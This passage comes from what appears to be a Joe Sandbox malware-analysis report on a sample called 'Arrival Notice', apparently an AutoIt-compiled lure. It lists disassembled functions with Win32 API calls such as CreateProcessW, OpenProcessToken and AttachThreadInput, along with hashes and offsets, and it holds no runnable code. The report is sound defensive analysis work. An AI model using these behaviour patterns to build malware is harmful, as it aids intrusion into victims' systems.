                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: a86d2c8d712de97ce443eb2cbf8354a17357d9009e61c8a985123a9c83dae9d5
                                              • Instruction ID: 0a8249b35282ba83904329bff9db0212b1c894d5442070127d2666fbae45815c
                                              • Opcode Fuzzy Hash: a86d2c8d712de97ce443eb2cbf8354a17357d9009e61c8a985123a9c83dae9d5
                                              • Instruction Fuzzy Hash: 4B118E31C19A1DDBCF00AFE6D85AAEEBB78FF09716F044055E940B2250CB3055609FD6
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction ID: 50feec98bb02685a66ee99191c3714038b3b2e333de5373225d2bacb1f164c80
                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction Fuzzy Hash: 5001403684414EBFCF525FC8CC018EE7F66BF59361B588515FA2898071D237E9B1AB81
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 0095B59E
                                              • ScreenToClient.USER32(?,?), ref: 0095B5B6
                                              • ScreenToClient.USER32(?,?), ref: 0095B5DA
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0095B5F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: d699e4bef185bfb73447fbc1799b5ccf32507646214166304f749e0f740a8098
                                              • Instruction ID: 45db50ad3ecf49609e8eeb2f93bf6b93c9a0177b6e350097ff796e382a47d646
                                              • Opcode Fuzzy Hash: d699e4bef185bfb73447fbc1799b5ccf32507646214166304f749e0f740a8098
                                              • Instruction Fuzzy Hash: A91143B9D0520DEFDB41CFA9C8849EEFBB9FB08311F108166E914E3220D735AA559F90
                                              APIs
                                              • _memset.LIBCMT ref: 0095B8FE
                                              • _memset.LIBCMT ref: 0095B90D
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00997F20,00997F64), ref: 0095B93C
                                              • CloseHandle.KERNEL32 ref: 0095B94E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateHandleProcess
                                              • String ID:
                                              • API String ID: 3277943733-0
                                              • Opcode ID: fe0cf9e19f27710dba5f2ffccae03677ba3d6db99ee6ffcda8473b32dae80e09
                                              • Instruction ID: 58e3c4c0585d91f5852d6419ebf3f165516767347c61c2482da2c82a212693b5
                                              • Opcode Fuzzy Hash: fe0cf9e19f27710dba5f2ffccae03677ba3d6db99ee6ffcda8473b32dae80e09
                                              • Instruction Fuzzy Hash: 07F054B25683047BF61027B9AC05F7BBA9CEB09355F000022BB08F51A1DB71490097B9
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 00936E88
                                                • Part of subcall function 0093794E: _memset.LIBCMT ref: 00937983
                                              • _memmove.LIBCMT ref: 00936EAB
                                              • _memset.LIBCMT ref: 00936EB8
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00936EC8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                              • String ID:
                                              • API String ID: 48991266-0
                                              • Opcode ID: 57e41c5e726ba1d3e1f9600a050de37cf1740896fc2ed57213395a360d6ebe5f
                                              • Instruction ID: 7b443750da0e5bb8b4840ca9a520a7b103ba4976f4337b7caa1e78eb3eaba952
                                              • Opcode Fuzzy Hash: 57e41c5e726ba1d3e1f9600a050de37cf1740896fc2ed57213395a360d6ebe5f
                                              • Instruction Fuzzy Hash: A5F0547A104204ABCF016F55EC85B5ABB2AEF85331F048061FE089E216CB31E911DBB5
                                              APIs
                                                • Part of subcall function 008D12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D134D
                                                • Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D135C
                                                • Part of subcall function 008D12F3: BeginPath.GDI32(?), ref: 008D1373
                                                • Part of subcall function 008D12F3: SelectObject.GDI32(?,00000000), ref: 008D139C
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095C030
                                              • LineTo.GDI32(00000000,?,?), ref: 0095C03D
                                              • EndPath.GDI32(00000000), ref: 0095C04D
                                              • StrokePath.GDI32(00000000), ref: 0095C05B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: e58f6793d579b1a73c9c6a321423bc340464137b5d29a13cb080c55b5b79be95
                                              • Instruction ID: 4ba7b46bc202bbc4ca189d3107df04a7f388fbf9e3dfd7cfaf6c2c80c294844d
                                              • Opcode Fuzzy Hash: e58f6793d579b1a73c9c6a321423bc340464137b5d29a13cb080c55b5b79be95
                                              • Instruction Fuzzy Hash: 7FF05E32019359BBDB126F66AC0DFCE3F99AF05322F084041FA11610E287765655EB95
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0092A399
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0092A3AC
                                              • GetCurrentThreadId.KERNEL32 ref: 0092A3B3
                                              • AttachThreadInput.USER32(00000000), ref: 0092A3BA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: e1632420bde5400da70a55caee6e4cec00feafaaf5cca2b0203d0856f1a593f0
                                              • Instruction ID: e030ebeaa1d8e0d8fe0f96d38a1bccfa9038d48f72998930b422d6f6651f8ef3
                                              • Opcode Fuzzy Hash: e1632420bde5400da70a55caee6e4cec00feafaaf5cca2b0203d0856f1a593f0
                                              • Instruction Fuzzy Hash: A3E0C93254A338BBDB205BA2EC1DED77F5CEF167B2F008025F50995061C6758540EBA1
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 008D2231
                                              • SetTextColor.GDI32(?,000000FF), ref: 008D223B
                                              • SetBkMode.GDI32(?,00000001), ref: 008D2250
                                              • GetStockObject.GDI32(00000005), ref: 008D2258
                                              • GetWindowDC.USER32(?,00000000), ref: 0090C0D3
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0090C0E0
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0090C0F9
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0090C112
                                              • GetPixel.GDI32(00000000,?,?), ref: 0090C132
                                              • ReleaseDC.USER32(?,00000000), ref: 0090C13D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: 3d13aad587642c60d34225dbb1164a027fcc18088846611f08c157310b3cddf9
                                              • Instruction ID: bb8df2bcfcfe8eacbd397610e7cafb7482f6f4a3abeace38bc7e96c3b08200ee
                                              • Opcode Fuzzy Hash: 3d13aad587642c60d34225dbb1164a027fcc18088846611f08c157310b3cddf9
                                              • Instruction Fuzzy Hash: 7EE06D32118644EEDF215F75FC0DBE87B24EB15337F008366FAA9880E187714980EB11
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00928C63
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0092882E), ref: 00928C6A
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0092882E), ref: 00928C77
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0092882E), ref: 00928C7E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: 3b285bfec36db69dc6259576304a74f0e2e998115b5503db8568a10d7c62b68e
                                              • Instruction ID: 2149930eb374ee11bcc46ade4f8fdef31c842e63e0847fc13e1ee9b1321c0d1e
                                              • Opcode Fuzzy Hash: 3b285bfec36db69dc6259576304a74f0e2e998115b5503db8568a10d7c62b68e
                                              • Instruction Fuzzy Hash: C2E04F766563219BD7205FB26D0CB573BACAF507A3F084828E285DA080DA3484469B61
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00912187
                                              • GetDC.USER32(00000000), ref: 00912191
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009121B1
                                              • ReleaseDC.USER32(?), ref: 009121D2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: 53a6db4ab56a91d51f71ec3871b1af0890a87277f33c41dcb96ddb4702d06f44
                                              • Instruction ID: b5dd09ccb19f8fcf9419e4143687c996df38310b0de1e38845d125809d5bdb3f
                                              • Opcode Fuzzy Hash: 53a6db4ab56a91d51f71ec3871b1af0890a87277f33c41dcb96ddb4702d06f44
                                              • Instruction Fuzzy Hash: EAE0E575815218EFDF019F65C818A9D7BB1FB4C362F108426F95AD7260DB388141AF40
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 0091219B
                                              • GetDC.USER32(00000000), ref: 009121A5
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 009121B1
                                              • ReleaseDC.USER32(?), ref: 009121D2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: f9cc9678b2b2b8c5de61d517dcd0ef41cad7e502ef2ebbad9e35816c17e89dc6
                                              • Instruction ID: d263022b694de0612c51030fae312d5fdbf13dc65630a9f6cd20f2335961c0ec
                                              • Opcode Fuzzy Hash: f9cc9678b2b2b8c5de61d517dcd0ef41cad7e502ef2ebbad9e35816c17e89dc6
                                              • Instruction Fuzzy Hash: CAE0E575815218AFCF019F75C81869D7BA1FB4C322F108025F95AD7260DB389141AF40
                                              APIs
                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0092B981
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ContainedObject
                                              • String ID: AutoIt3GUI$Container
                                              • API String ID: 3565006973-3941886329
                                              • Opcode ID: 63b4cae441ba62fdf5d55b74796a6530b6b14a97ad8b0188e1dd95ed7b7e0d78
                                              • Instruction ID: d4ede75b38e32853593a7d578d5830362cbc4d79ccbc7d06588ae1176134e5c5
                                              • Opcode Fuzzy Hash: 63b4cae441ba62fdf5d55b74796a6530b6b14a97ad8b0188e1dd95ed7b7e0d78
                                              • Instruction Fuzzy Hash: 88914874600611AFDB24DF28D884B6ABBE8FF48710F24856EF94ACB395DB70E840CB50
                                              APIs
                                                • Part of subcall function 008EFEC6: _wcscpy.LIBCMT ref: 008EFEE9
                                                • Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
                                                • Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C
                                              • __wcsnicmp.LIBCMT ref: 0093B298
                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0093B361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                              • String ID: LPT
                                              • API String ID: 3222508074-1350329615
                                              • Opcode ID: 8ca278b2a63a4bf5dd374ec467bdfbc3d2b4e6552abd68b1a421f819645c0cec
                                              • Instruction ID: a18586d81db84e23d65d9573d0c84a2583e6d3ddf2fdea25287252dbbeb2c337
                                              • Opcode Fuzzy Hash: 8ca278b2a63a4bf5dd374ec467bdfbc3d2b4e6552abd68b1a421f819645c0cec
                                              • Instruction Fuzzy Hash: A5618075A00215AFCB14EF58C895EAEB7B8FF08310F11455AFA46AB351DB70AE40CF51
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 008E2AC8
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 008E2AE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: cde099e30fcd4881c979679fbb11e8cf1c3e9f1930335c71f2b7d1931099cebf
                                              • Instruction ID: d3deeebdd65cf07a098acdf2c68f0959c74e045e26f4d78fd8326464a69ab52e
                                              • Opcode Fuzzy Hash: cde099e30fcd4881c979679fbb11e8cf1c3e9f1930335c71f2b7d1931099cebf
                                              • Instruction Fuzzy Hash: 145149724187549BD320AF14DC86BAFBBE8FF84314F42895DF1D9911A1DB308969CB17
                                              APIs
                                                • Part of subcall function 008D506B: __fread_nolock.LIBCMT ref: 008D5089
                                              • _wcscmp.LIBCMT ref: 00939AAE
                                              • _wcscmp.LIBCMT ref: 00939AC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              • Opcode ID: d44468d34b05add16fd8f4abdb7c6f8c3f93d73d8df7f1f87dab173a80f86dca
                                              • Instruction ID: ef3ffbdadb66cd9429189ac044ac68dcb712c089fd61023f2410428a8b3daed5
                                              • Opcode Fuzzy Hash: d44468d34b05add16fd8f4abdb7c6f8c3f93d73d8df7f1f87dab173a80f86dca
                                              • Instruction Fuzzy Hash: BC41B971A00619BBDF209AA4DC45FEFBBBDEF45714F00047AF900E7281D6B59E048BA2
                                              APIs
                                              • _memset.LIBCMT ref: 00942892
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009428C8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CrackInternet_memset
                                              • String ID: |
                                              • API String ID: 1413715105-2343686810
                                              • Opcode ID: 4da88296863468b5854cb5a88ce0f88744450f040d481f30c079062507bc228a
                                              • Instruction ID: e2ffff8a16f45eeb488dce2a1e09f72ef8e3111f991670cf451c3825fc10de96
                                              • Opcode Fuzzy Hash: 4da88296863468b5854cb5a88ce0f88744450f040d481f30c079062507bc228a
                                              • Instruction Fuzzy Hash: 82313D71810119AFCF01EFA5CC85EEEBFB9FF08350F10412AF815A6266EB315A56DB61
                                              APIs
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00957DD0
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00957DE5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: ab500cc3c625afe5c320de8dc69b5223ee4432fb51709cb0c3435e6fb7bcf137
                                              • Instruction ID: c6afd8b25af3d03e46b0364a0e6aab46c265426a857ab64e168bbddfa7deff0d
                                              • Opcode Fuzzy Hash: ab500cc3c625afe5c320de8dc69b5223ee4432fb51709cb0c3435e6fb7bcf137
                                              • Instruction Fuzzy Hash: 7F411874A053099FDB10CFAAD881BEABBB9FF09301F10016AED059B381D730AA45CF90
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00956D86
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00956DC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: a010839821e8d447d0b87f4b8f21649ca00717efcb6f2fcbfb50dfb5c6177d42
                                              • Instruction ID: 3ef9ab8e8e864e38fd453157e207d27c96601a6d16f37aa0d79d4e2650b70a8f
                                              • Opcode Fuzzy Hash: a010839821e8d447d0b87f4b8f21649ca00717efcb6f2fcbfb50dfb5c6177d42
